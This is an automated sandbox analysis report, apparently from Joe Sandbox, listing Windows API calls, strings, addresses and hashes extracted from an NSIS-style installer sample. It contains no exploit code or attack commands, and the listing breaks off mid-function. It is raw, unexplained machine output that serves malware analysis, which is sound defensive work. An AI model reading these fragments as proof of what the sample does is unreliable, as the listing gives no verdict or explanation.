                                                          • lstrcatW.KERNEL32(00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040386E
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387F
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00441800,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403887
                                                          • DeleteFileW.KERNEL32(00441000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040389B
                                                          • lstrlenW.KERNEL32(00441800,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403974
                                                            • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                          • wsprintfW.USER32 ref: 004039D1
                                                          • GetFileAttributesW.KERNEL32(00437800,00441800), ref: 00403A04
                                                          • DeleteFileW.KERNEL32(00437800), ref: 00403A10
                                                          • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 00403A3E
                                                            • Part of subcall function 00406337: MoveFileExW.KERNEL32(?,?,00000005,00405E35,?,00000000,000000F1,?,?,?,?,?), ref: 00406341
                                                          • CopyFileW.KERNEL32(00442800,00437800,00000001,00441800,00000000), ref: 00403A54
                                                            • Part of subcall function 00405B5A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                            • Part of subcall function 00405B5A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                            • Part of subcall function 004068D4: FindFirstFileW.KERNEL32(74DF3420,0042FAB8,0042F270,00405F97,0042F270,0042F270,00000000,0042F270,0042F270,74DF3420,?,00441800,00405CA3,?,74DF3420,00441800), ref: 004068DF
                                                            • Part of subcall function 004068D4: FindClose.KERNEL32(00000000), ref: 004068EB
                                                          • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AA2
                                                          • ExitProcess.KERNEL32 ref: 00403ABF
                                                          • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AC6
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AE2
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AE9
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AFE
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B21
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B46
                                                          • ExitProcess.KERNEL32 ref: 00403B69
                                                            • Part of subcall function 00405B25: CreateDirectoryW.KERNEL32(?,00000000,00403545,00441800,00441800,00441800,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 00405B2B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                          • String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                          • API String ID: 1813718867-2779336553
                                                          • Opcode ID: bbfb8ee3b373486c2b96c0f4544b3db19e0e60a46ad8d454647acdf6da7e114b
                                                          • Instruction ID: 854c728f01c0035939758d15b123b9002cb8995d15bf2fdbd915a0a46deb4321
                                                          • Opcode Fuzzy Hash: bbfb8ee3b373486c2b96c0f4544b3db19e0e60a46ad8d454647acdf6da7e114b
                                                          • Instruction Fuzzy Hash: 6DF1F470604301ABD320AF659D05B6B7EE8EB8570AF10483FF581B22D1DB7DDA458B6E
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 00405CAC
                                                          • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405CF4
                                                          • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405D17
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405D1D
                                                          • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405D2D
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DCD
                                                          • FindClose.KERNEL32(00000000), ref: 00405DDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: \*.*$pB
                                                          • API String ID: 2035342205-1006940126
                                                          • Opcode ID: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                          • Instruction ID: 26a84cf893ecfac7fe2d2a8ab9ced37764d13583991ceadb599b2dfedf858990
                                                          • Opcode Fuzzy Hash: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                          • Instruction Fuzzy Hash: 8E41B030800A18B6CB21AB65DC4DAAF7778EF42718F10813BF851711D1DB7C4A82DEAE
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405799
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004057A8
                                                          • GetClientRect.USER32(?,?), ref: 004057E5
                                                          • GetSystemMetrics.USER32(00000002), ref: 004057EC
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040580D
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040581E
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405831
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040583F
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405852
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405874
                                                          • ShowWindow.USER32(?,00000008), ref: 00405888
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058A9
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004058B9
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058D2
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058DE
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004057B7
                                                            • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058FB
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000056CF,00000000), ref: 00405909
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405910
                                                          • ShowWindow.USER32(00000000), ref: 00405934
                                                          • ShowWindow.USER32(?,00000008), ref: 00405939
                                                          • ShowWindow.USER32(00000008), ref: 00405983
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004059B7
                                                          • CreatePopupMenu.USER32 ref: 004059C8
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059DC
                                                          • GetWindowRect.USER32(?,?), ref: 004059FC
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405A15
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A4D
                                                          • OpenClipboard.USER32(00000000), ref: 00405A5D
                                                          • EmptyClipboard.USER32 ref: 00405A63
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A6F
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405A79
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A8D
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405AAD
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405AB8
                                                          • CloseClipboard.USER32 ref: 00405ABE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {
                                                          • API String ID: 590372296-366298937
                                                          • Opcode ID: dfead9bfc37cf3db2b35e915a87c725964709008a4f247d6999fb4be6a1ac7a0
                                                          • Instruction ID: d3b07f9c2581fb6b60ef1a2666babd9f8dcdaaa8066b0d43d813b8afd8e95190
                                                          • Opcode Fuzzy Hash: dfead9bfc37cf3db2b35e915a87c725964709008a4f247d6999fb4be6a1ac7a0
                                                          • Instruction Fuzzy Hash: 03B159B0900608FFDF11AF60DD89AAE7B79FB48355F00813AFA45BA1A0C7785A51DF58
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404F7B
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404F86
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FD0
                                                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FE7
                                                          • SetWindowLongW.USER32(?,000000FC,00405570), ref: 00405000
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00405014
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405026
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 0040503C
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405048
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040505A
                                                          • DeleteObject.GDI32(00000000), ref: 0040505D
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405088
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405094
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040512F
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040515F
                                                            • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405173
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004051A1
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004051AF
                                                          • ShowWindow.USER32(?,00000005), ref: 004051BF
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 004052BA
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040531F
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405334
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405358
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405378
                                                          • ImageList_Destroy.COMCTL32(?), ref: 0040538D
                                                          • GlobalFree.KERNEL32(?), ref: 0040539D
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004054BF
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054CE
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054F9
                                                          • ShowWindow.USER32(?,00000000), ref: 00405547
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405552
                                                          • ShowWindow.USER32(00000000), ref: 00405559
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                          • Instruction ID: 2b71226c2ce540754c325362a134889399d6c5c4637dca841463e5b600fa6882
                                                          • Opcode Fuzzy Hash: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                          • Instruction Fuzzy Hash: 8802AD70900608AFDF20DFA8DD85AAF7BB5FB45314F10817AE611BA2E1D7798A41CF58
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404033
                                                          • ShowWindow.USER32(?), ref: 00404053
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404065
                                                          • ShowWindow.USER32(?,00000004), ref: 0040407E
                                                          • DestroyWindow.USER32 ref: 00404092
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 004040AB
                                                          • GetDlgItem.USER32(?,?), ref: 004040CA
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040DE
                                                          • IsWindowEnabled.USER32(00000000), ref: 004040E5
                                                          • GetDlgItem.USER32(?,00000001), ref: 00404190
                                                          • GetDlgItem.USER32(?,00000002), ref: 0040419A
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 004041B4
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404205
                                                          • GetDlgItem.USER32(?,00000003), ref: 004042AB
                                                          • ShowWindow.USER32(00000000,?), ref: 004042CC
                                                          • EnableWindow.USER32(?,?), ref: 004042DE
                                                          • EnableWindow.USER32(?,?), ref: 004042F9
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040430F
                                                          • EnableMenuItem.USER32(00000000), ref: 00404316
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040432E
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404341
                                                          • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040436B
                                                          • SetWindowTextW.USER32(?,0042CA68), ref: 0040437F
                                                          • ShowWindow.USER32(?,0000000A), ref: 004044B3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 1860320154-0
                                                          • Opcode ID: 85e06a1bfb462d71b49bda8b571905cea54c43c8c85ee92c4a54339351a5f343
                                                          • Instruction ID: 8cad316efbf8f9c89f6feec2797fb874042f4abab253e3557332251604c97906
                                                          • Opcode Fuzzy Hash: 85e06a1bfb462d71b49bda8b571905cea54c43c8c85ee92c4a54339351a5f343
                                                          • Instruction Fuzzy Hash: C6C1A1B1500204BBDB206F61EE89E2B3AA8FB85755F01453EF751B51F0CB39A8529B2D
                                                          APIs
                                                            • Part of subcall function 0040696B: GetModuleHandleA.KERNEL32(?,00000020,?,00403662,0000000C,?,?,?,?,?,?,?,?), ref: 0040697D
                                                            • Part of subcall function 0040696B: GetProcAddress.KERNEL32(00000000,?), ref: 00406998
                                                          • lstrcatW.KERNEL32(00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,00441800,00000000,0043F000,00008001), ref: 00403CCA
                                                          • lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D4A
                                                          • lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D5D
                                                          • GetFileAttributesW.KERNEL32(004326A0), ref: 00403D68
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403DB1
                                                            • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                          • RegisterClassW.USER32(004336A0), ref: 00403DEE
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403E06
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E3B
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E71
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E9D
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403EAA
                                                          • RegisterClassW.USER32(004336A0), ref: 00403EB3
                                                          • DialogBoxParamW.USER32(?,00000000,00403FF7,00000000), ref: 00403ED2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-1115850852
                                                          • Opcode ID: a4b6b062c3cda51b96eb3e1e848ea22fea792b1bb39582dd55e536ebb93ad2e9
                                                          • Instruction ID: c722afd28cb3ad108a11d8546cd61d6ece1c23d3a169ae69e987cf65e7f86a01
                                                          • Opcode Fuzzy Hash: a4b6b062c3cda51b96eb3e1e848ea22fea792b1bb39582dd55e536ebb93ad2e9
                                                          • Instruction Fuzzy Hash: 7961C370500700BED620AF66AD46F2B3A6CEB85B5AF40053FF945B22E2DB7C5941CA6D
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404753
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404767
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404784
                                                          • GetSysColor.USER32(?), ref: 00404795
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004047A3
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004047B1
                                                          • lstrlenW.KERNEL32(?), ref: 004047B6
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047C3
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047D8
                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404831
                                                          • SendMessageW.USER32(00000000), ref: 00404838
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404863
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004048A6
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004048B4
                                                          • SetCursor.USER32(00000000), ref: 004048B7
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004048D0
                                                          • SetCursor.USER32(00000000), ref: 004048D3
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404902
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404914
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: ,F@$N
                                                          • API String ID: 3103080414-1819947528
                                                          • Opcode ID: ffd7346a229d966f7877475afaa511d8b27e78dae7af650fbb9c2f9128a087cb
                                                          • Instruction ID: ccb0ec9a7d9d767aff215416cd1a2e620de701fb5c4a8d8609e67ea5798c0c5e
                                                          • Opcode Fuzzy Hash: ffd7346a229d966f7877475afaa511d8b27e78dae7af650fbb9c2f9128a087cb
                                                          • Instruction Fuzzy Hash: 046192F1900209BFDB10AF64DD85EAA7B69FB84315F00853AFB05B65E0C778A951CF98
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                          • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                          • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                          • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406358,?,?), ref: 004061F8
                                                          • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 00406201
                                                            • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                            • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                          • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 0040621E
                                                          • wsprintfA.USER32 ref: 0040623C
                                                          • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406277
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406286
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004062BE
                                                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406314
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406325
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040632C
                                                            • Part of subcall function 00406067: GetFileAttributesW.KERNEL32(00000003,004030E2,00442800,80000000,00000003), ref: 0040606B
                                                            • Part of subcall function 00406067: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
                                                          • Opcode ID: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
                                                          • Instruction ID: 21ba76f912769f78f8e3df01d85e3e27af82f360ac84a16f7af8f01611abcd2b
                                                          • Opcode Fuzzy Hash: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
                                                          • Instruction Fuzzy Hash: 66314330240325BBD2206B659D48F6B3B6CDF45708F16043EFD42B62C2DA3C982486BD
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404A36
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404A60
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404B11
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404B1C
                                                          • lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B4E
                                                          • lstrcatW.KERNEL32(?,004326A0), ref: 00404B5A
